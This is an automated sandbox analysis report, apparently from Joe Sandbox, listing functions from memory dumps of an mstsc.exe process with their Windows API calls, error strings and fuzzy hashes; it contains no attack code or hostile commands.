                                                                                                                                                                                    • Opcode Fuzzy Hash: 987be12cc315e71f8cd2f357d3c54877b4aec39bc5180682354b024312c748ee
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1521A7B2F142289BDB21CF588D84BB777ACEB45720F10016AFC55AB195DAB0DD40CBA1
                                                                                                                                                                                    Function 00935B7D Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 85windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,00003309), ref: 00935B92
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000402,00000001,00000000), ref: 00935BAA
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000400,00000000,00000000), ref: 00935BB8
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000330B,?,?,00935623,?,?,?), ref: 00935BCF
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000330B,00000000,?,?), ref: 00935C18
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00935C1F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$MessageSendText$FreeLocal
                                                                                                                                                                                    • String ID: FormatMessage failed
                                                                                                                                                                                    • API String ID: 449125137-2409667863
                                                                                                                                                                                    • Opcode ID: d833f289fe4b26300c8387ef69fb45b3d57e9b04d7f89dd93bdd5c4aa5c8e7dd
                                                                                                                                                                                    • Instruction ID: 4e5fefd0dd173df4e24d3c10d1d46d17f2c306b2cda06c7555a99e7691eb50ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: d833f289fe4b26300c8387ef69fb45b3d57e9b04d7f89dd93bdd5c4aa5c8e7dd
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE210571604308BFDB259B50CD89F7A7B69EB48314F190029F980AB1A2CBB1DE019E80
                                                                                                                                                                                    Function 00945BB7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,00000000), ref: 00945BDA
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00945BE1
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 00945BFE
                                                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 00945C13
                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%windir%\system32\mstsc.exe,?,00000104), ref: 00945C71
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProc$CommandCurrentEnvironmentExpandFreeLibraryLineMessageProcessStringsTrace
                                                                                                                                                                                    • String ID: %windir%\system32\mstsc.exe$IsWow64Process$kernel32
                                                                                                                                                                                    • API String ID: 3350929514-3730019692
                                                                                                                                                                                    • Opcode ID: 5397c265bef8a0ffe876a151fd654bf26aab00ef26b363d3d383f784ec3ad0db
                                                                                                                                                                                    • Instruction ID: 483df87d9c1cef5834046a6e7bdaf55c0f31235338dded770993f617c235aa6e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5397c265bef8a0ffe876a151fd654bf26aab00ef26b363d3d383f784ec3ad0db
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6521D872A5831CAFD7309FF4DC89FA977A8AB44315F010599F845D3292CA70DD809F55
                                                                                                                                                                                    Function 0091B237 Relevance: 13.6, APIs: 9, Instructions: 72windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0091B252
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0091B258
                                                                                                                                                                                      • Part of subcall function 0091D776: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B5BC,00000016,00000000,?,0094570B,0091396B,00000000,0096AFA8,?,00964F32,0096AFA8,00000000), ref: 0091D787
                                                                                                                                                                                    • IsWindow.USER32(?), ref: 0091B285
                                                                                                                                                                                    • SendMessageW.USER32(?,00000423,00000000,00000000), ref: 0091B299
                                                                                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 0091B2A4
                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0091B2A9
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0091B2B5
                                                                                                                                                                                    • UpdateWindow.USER32 ref: 0091B2BE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Show$Message$ForegroundInvalidateRectSendTraceUpdate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3422817459-0
                                                                                                                                                                                    • Opcode ID: fa576a073ab221739640e52d675be7898ced8a68b7620612603dee926ec5610d
                                                                                                                                                                                    • Instruction ID: fb8bdf5e35b13ddc9df260b233e21153ceb6100371cebc85da250ef2e85c08f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa576a073ab221739640e52d675be7898ced8a68b7620612603dee926ec5610d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F2141B1214308AFD7215F16DD48AAA7BAAEF51715B00482DF29251470C7B29C92DB10
                                                                                                                                                                                    Function 009573C4 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 414encryptionCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CertVerifyCertificateChainPolicy.CRYPT32(00000002,?,0000000C,?), ref: 0095776A
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,?,?,00000000,00000002,?), ref: 00957798
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,?,?,00000000,00000002,?), ref: 009577C7
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    • CertFreeCertificateChain.CRYPT32(?,?,?,00000000,?,?,00000000,00000002,?), ref: 009578AA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RdpSignCertChainRevocationCheck, xrefs: 00957460
                                                                                                                                                                                    • ConstructCertificateChain failed!, xrefs: 009574E5
                                                                                                                                                                                    • ValidateCertificate failed, xrefs: 009578D0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CertCertificateChainErrorFreeLast$AddressHandleLibraryMessageModulePolicyProcTraceVerify
                                                                                                                                                                                    • String ID: ConstructCertificateChain failed!$RdpSignCertChainRevocationCheck$ValidateCertificate failed
                                                                                                                                                                                    • API String ID: 3723874871-2658871624
                                                                                                                                                                                    • Opcode ID: d2b7431e5c4dcfc23a4594e1c856ee2fc8c405318ad1d19bf6d103f4270ff90f
                                                                                                                                                                                    • Instruction ID: 1ffffa7afa81bca2503d9f26d1ffdd52765f35b92dbbcda3618762a07bfccc1c
                                                                                                                                                                                    • Opcode Fuzzy Hash: d2b7431e5c4dcfc23a4594e1c856ee2fc8c405318ad1d19bf6d103f4270ff90f
                                                                                                                                                                                    • Instruction Fuzzy Hash: F2E1C431618345AFD729CF99E489B65BAEAAB48301F14044CF940AB2F2D7B5CEC4DF16
                                                                                                                                                                                    Function 022E0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __fassign
                                                                                                                                                                                    • String ID: .$:$:
                                                                                                                                                                                    • API String ID: 3965848254-2308638275
                                                                                                                                                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                    • Instruction ID: da2724ded5239e8eb162b59679157de157c6df26ccbdea8d04ef20c4387821af
                                                                                                                                                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 64A19C71D2020ADACF24CFE4C8547BEB7B5BB05708FA4946AD403B7288D7B49B46EB51
                                                                                                                                                                                    Function 0093C846 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 172COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • LoadDefaultProfile Failed, xrefs: 0093C8FE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$AddressFreeHandleIconLibraryLoadModuleProcSendTrace
                                                                                                                                                                                    • String ID: LoadDefaultProfile Failed
                                                                                                                                                                                    • API String ID: 762468045-1435745046
                                                                                                                                                                                    • Opcode ID: 6d35d4e006c5ebc481eeabd653210addcb75d23a93b7939ed05cfa48e34f420a
                                                                                                                                                                                    • Instruction ID: 283620d5bae452915234e491cb9ba44fbe6de10650ce189f8f762bc03f650c47
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d35d4e006c5ebc481eeabd653210addcb75d23a93b7939ed05cfa48e34f420a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F51CFB5604B04AFDB29DF64C899B2577E6BB89304F1004ACF646EB2A2CB71EC44DF05
                                                                                                                                                                                    Function 00958348 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000800,?,?,?,?,?,0095833F,?,?,00000000), ref: 0095845C
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Unable to initialize file name from moniker!, xrefs: 00958394
                                                                                                                                                                                    • Failed to close file stream!, xrefs: 00958427
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressAllocFreeHandleLibraryLocalMessageModuleProcTrace
                                                                                                                                                                                    • String ID: Failed to close file stream!$Unable to initialize file name from moniker!
                                                                                                                                                                                    • API String ID: 673940520-1650752352
                                                                                                                                                                                    • Opcode ID: 1ceb454d9e1ce9783f75e781494fa26889270e74bc64238bad972d440361a7cb
                                                                                                                                                                                    • Instruction ID: 241e1cd5d7e578025fda1f675c63e9dd1f6534e80d9e4c391e9a32d8c6c60d3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ceb454d9e1ce9783f75e781494fa26889270e74bc64238bad972d440361a7cb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0251F5716143456FD729CF6AC849F663B99BB09311F040599FE00BB2B2DB74DC88EB89
                                                                                                                                                                                    Function 00910AB0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000,00000000), ref: 00910B04
                                                                                                                                                                                      • Part of subcall function 0091142A: GetLastError.KERNEL32(00910B13), ref: 0091142A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorFileLastModuleName
                                                                                                                                                                                    • String ID: .tlb
                                                                                                                                                                                    • API String ID: 2776309574-1487266626
                                                                                                                                                                                    • Opcode ID: 9ceb8ea7bf6c018b29a0c553d3b50f3b888e45a3b6adcf71de232f13af22528c
                                                                                                                                                                                    • Instruction ID: 3f6150d2e4a6acb19fb4d8e3b9fc4406b7b7fd6980f2cc027d4cab5f4cf4713b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ceb8ea7bf6c018b29a0c553d3b50f3b888e45a3b6adcf71de232f13af22528c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 69419471B4522D9BDF209FA49C94AFE73ACEB84314F1041A9EC45E7210E6B59EC4CB50
                                                                                                                                                                                    Function 0091705B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsWindow.USER32(?), ref: 009170AF
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 009170BE
                                                                                                                                                                                    • IsWindow.USER32(?), ref: 009170C7
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 009170D0
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 009170DF
                                                                                                                                                                                      • Part of subcall function 00910259: EnterCriticalSection.KERNEL32(0096B000,00000000,?,0091011C,00000000,00000001,?,00000000,?,00000000,00000000,?,?,?,0091007F,?), ref: 00910265
                                                                                                                                                                                      • Part of subcall function 00910259: LeaveCriticalSection.KERNEL32(0096B000,?,0091011C,00000000,00000001,?,00000000,?,00000000,00000000,?,?,?,0091007F,?), ref: 009102C7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Failed RegisterPopupParentWindowClass(FALSE), xrefs: 0091711A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CriticalDestroySection$DeleteEnterLeaveObject
                                                                                                                                                                                    • String ID: Failed RegisterPopupParentWindowClass(FALSE)
                                                                                                                                                                                    • API String ID: 557206002-2507639134
                                                                                                                                                                                    • Opcode ID: 76561b6f7c33568c5b30305638afcf8bf10966116a86dc5c040fcfe445364172
                                                                                                                                                                                    • Instruction ID: 94e511adecdb20bde884a86ec8b56e907f1fd9e0f58fce723d6292b06ada641a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 76561b6f7c33568c5b30305638afcf8bf10966116a86dc5c040fcfe445364172
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6831827431830A9FD7389F65C998BB6B7B9BF88315F54041DE482865B1CBB5E880DF50
                                                                                                                                                                                    Function 009310E8 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 333COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • StringCchCopy failed, xrefs: 00931516, 00931560
                                                                                                                                                                                    • IMsRdpDeviceCollection::DeviceCount failed!, xrefs: 00931241
                                                                                                                                                                                    • IMsRdpClient5::get_DeviceCollection failed!, xrefs: 009311F2
                                                                                                                                                                                    • IMsRdpDevice::get_DeviceInstanceId failed, xrefs: 0093144C
                                                                                                                                                                                    • QI for IMsRdpClientNonScriptable3 failed!, xrefs: 0093118A
                                                                                                                                                                                    • IMsRdpDeviceCollection::get_DeviceByIndex failed!, xrefs: 00931497
                                                                                                                                                                                    • DynamicDevices, xrefs: 009313C3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: DynamicDevices$IMsRdpClient5::get_DeviceCollection failed!$IMsRdpDevice::get_DeviceInstanceId failed$IMsRdpDeviceCollection::DeviceCount failed!$IMsRdpDeviceCollection::get_DeviceByIndex failed!$QI for IMsRdpClientNonScriptable3 failed!$StringCchCopy failed
                                                                                                                                                                                    • API String ID: 2221118986-430872028
                                                                                                                                                                                    • Opcode ID: 83126bc19d1210b684698790f431910ff48f53c73ea675a400a7ce0603747a00
                                                                                                                                                                                    • Instruction ID: 0988cc0a8fe5e16d1d70dc377998235d66069414cefa3bef46e770d9773773d5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 83126bc19d1210b684698790f431910ff48f53c73ea675a400a7ce0603747a00
                                                                                                                                                                                    • Instruction Fuzzy Hash: DDC1B331A043189FDB29DF24C859BAA77AABF85304F00C198E445AB2B1CB75DD85DF91
                                                                                                                                                                                    Function 0093FBAE Relevance: 12.2, APIs: 8, Instructions: 220memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,0000003C,?,?,?,?,?,0093C871,00000000,?,00000000,?), ref: 0093FBCE
                                                                                                                                                                                    • memset.MSVCRT ref: 0093FBE4
                                                                                                                                                                                    • _wtol.MSVCRT ref: 0093FC56
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    • _wtol.MSVCRT ref: 0093FCC7
                                                                                                                                                                                    • _wtol.MSVCRT ref: 0093FD1A
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0093FD36
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0093FE2E
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(0093C871), ref: 0093FE47
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wtol$FreeLocal$??2@??3@AddressAllocHandleLibraryModuleProcmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2266593360-0
                                                                                                                                                                                    • Opcode ID: 0be121a2ba4ec8220dc122776f65acc407447f5af152be998a27c13e61a0bca2
                                                                                                                                                                                    • Instruction ID: 42915f45bfabeba92351bfac54c4d209c764bb95c9382443babc88ca22fe5d3e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0be121a2ba4ec8220dc122776f65acc407447f5af152be998a27c13e61a0bca2
                                                                                                                                                                                    • Instruction Fuzzy Hash: C481DF70A043019FDB28DF65D969F267BE5EB48700F01056CEA4A9B7E2DB78E840DF44
                                                                                                                                                                                    Function 0091F138 Relevance: 12.2, APIs: 8, Instructions: 162windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0091F727: IsWindow.USER32(?), ref: 0091F757
                                                                                                                                                                                      • Part of subcall function 0091F727: GetWindowLongW.USER32(0091F1A5,000000F0), ref: 0091F789
                                                                                                                                                                                      • Part of subcall function 0091F727: GetWindowLongW.USER32(0091F1A5,000000EC), ref: 0091F79D
                                                                                                                                                                                      • Part of subcall function 0091F727: GetMenu.USER32(0091F1A5,00000000,?,?,?,0091F1A5), ref: 0091F7A3
                                                                                                                                                                                      • Part of subcall function 0091F727: AdjustWindowRectEx.USER32(00000000,?,00000000), ref: 0091F7B5
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0091F1CF
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0091F1F3
                                                                                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 0091F1FE
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0091F225
                                                                                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 0091F27A
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000002), ref: 0091F28D
                                                                                                                                                                                    • SetFocus.USER32 ref: 0091F2C2
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091F2CC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Long$RectText$AdjustErrorFocusLastMenuShow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3365892010-0
                                                                                                                                                                                    • Opcode ID: d9609e310f732afcedafff77b130d026b1749d32620d3c2cf1d5de1c1ef4612c
                                                                                                                                                                                    • Instruction ID: b9332ccaa888a471f616262120bbe8bbc54c2e1d7dc23cbe3f37e94aff601d02
                                                                                                                                                                                    • Opcode Fuzzy Hash: d9609e310f732afcedafff77b130d026b1749d32620d3c2cf1d5de1c1ef4612c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 56519FB16046089FDB14DF78CD59BBEB7F9AF88304F00452DEA96A2291CB34A841DB14
                                                                                                                                                                                    Function 00942874 Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 131memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00001088,0096A020,756F2CDC,?,009412AF,?,?,00001084,00001088), ref: 0094288D
                                                                                                                                                                                    • GetLastError.KERNEL32(?,009412AF,?,?,00001084,00001088), ref: 00942899
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,009412AF,?,?,00001084,00001088), ref: 009428F7
                                                                                                                                                                                    • memset.MSVCRT ref: 00942955
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00942969
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00942975
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 009429CC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharErrorLastLocalMultiWide$AllocFreememset
                                                                                                                                                                                    • String ID: pDest
                                                                                                                                                                                    • API String ID: 183355994-920669795
                                                                                                                                                                                    • Opcode ID: 28ad471323ca3ddd151bc58490762b4b5f970cfb07a001d34681e62d2ab0d0b1
                                                                                                                                                                                    • Instruction ID: a34b71d2da09a5d553a27d83d501628003db24691d0914d38fa195fa084a24bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 28ad471323ca3ddd151bc58490762b4b5f970cfb07a001d34681e62d2ab0d0b1
                                                                                                                                                                                    • Instruction Fuzzy Hash: C741D1725183047FE7258FA59D59F3A3B9DFB89320F550059F900AB2A2CAB5CC40ABA4
                                                                                                                                                                                    Function 00937160 Relevance: 12.1, APIs: 8, Instructions: 131windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00937195
